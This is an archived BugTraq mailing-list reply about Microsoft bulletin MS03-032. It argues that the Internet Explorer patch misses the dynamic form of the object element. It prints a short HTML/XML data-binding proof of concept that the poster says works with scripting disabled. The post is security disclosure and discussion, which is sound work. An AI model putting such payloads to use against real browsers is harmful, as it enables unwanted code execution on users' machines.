|
BugTraq
BAD NEWS: Microsoft Security Bulletin MS03-032 Sep 07 2003 01:16PM http-equiv@excite.com (1 malware com) (2 replies) Re: BAD NEWS: Microsoft Security Bulletin MS03-032 another temporary solution Sep 09 2003 09:59AM Igor Franchuk (sprog online ru) |
|
Privacy Statement |
This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
explains the problem in detail. Microsoft again patches the object element
in HTML, but it doesn't patch the dynamic version of that same element.
>1. Disable Active Scripting
This actually means that no scripting is needed at all in order to exploit
this amazingly critical vulnerability:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data=x.asp></object>
]]>
</exploit>
</security>
</xml>
Ouch.
[ reply ]